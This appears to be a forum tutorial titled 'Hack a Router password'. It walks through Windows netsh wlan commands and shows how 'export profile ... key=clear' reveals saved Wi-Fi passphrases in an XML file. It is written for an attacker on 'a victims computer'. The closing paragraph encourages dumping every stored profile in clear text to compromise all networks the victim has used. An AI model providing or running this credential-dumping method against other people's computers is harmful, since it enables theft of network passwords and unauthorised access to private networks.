Hack a Router password

Ever have physical access to a computer and want to know the router password? Ever have access to windows command line on a victims computer and want to know their router password? Try using netsh, it's a very powerful network utility built into windows vista and 7.

Here's a little of what it can do:

Code:
netsh wlan show interfaces

This command shows your wireless interfaces connected to your computer. It's the same as iwconfig in linux.

Code:
netsh wlan show drivers

This command shows the drivers of your wireless interfaces, this is sometimes useful if this is your own computer, but other than that not really.

Code:
netsh wlan show networks

This Command shows all of the networks in connection range of your wireless card. Similar to iwlist in linux

Code:
netsh wlan show profile

This command shows profiles of networks that you have connect to before

Code:
netsh wlan delete profile "profilename"

If you want to delete a profile that you've connected to before

Code:
netsh wlan show profile "profilename"

This shows some settings of your network that the profile specifies

Code:
netsh wlan connect name="profilename"

This will connect your wireless interface to the network of the profile you specify
Here's how you find the wireless key of a network that the host has connected to:

Code:
netsh wlan export profile name="profilename" key=clear

This will export the profile into an xml document. You can open that up in your internet browser or in notepad. It will export in windows/system32/wireless network connection-profilename
If you don't type key=clear, the key will be encrypted.

Once you open up your profile, it will look like this:
Code:
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
<name>Test Network</name>
<SSIDConfig>
<SSID>
<hex>74657374206E6574776F726B</hex>
<name>Test Network</name>
</SSID>
<nonBroadcast>false</nonBroadcast>
</SSIDConfig>
<connectionType>ESS</connectionType>
<connectionMode>auto</connectionMode>
<autoSwitch>false</autoSwitch>
<MSM>
<security>
<authEncryption>
<authentication>WPAPSK</authentication>
<encryption>TKIP</encryption>
<useOneX>false</useOneX>
</authEncryption>
<sharedKey>
<keyType>passPhrase</keyType>
<protected>false</protected>
<keyMaterial>PasswordHere</keyMaterial>
</sharedKey>
</security>
</MSM>
</WLANProfile>

Notice the <keyMaterial>PasswordHere</keyMaterial>
That's where your password will be located

Not bad for windows command line, huh?

Now take it a step further, how about dumping every profile with key=clear on a victims computer and compromising every network that the victim has ever connected to with one script? You could write your own script to do so, it wouldn't be too hard to write a simple batch file that exports all of the wireless profiles at once in clear text, but why reinvent the wheel? There's scripts out there already, you just have to look for them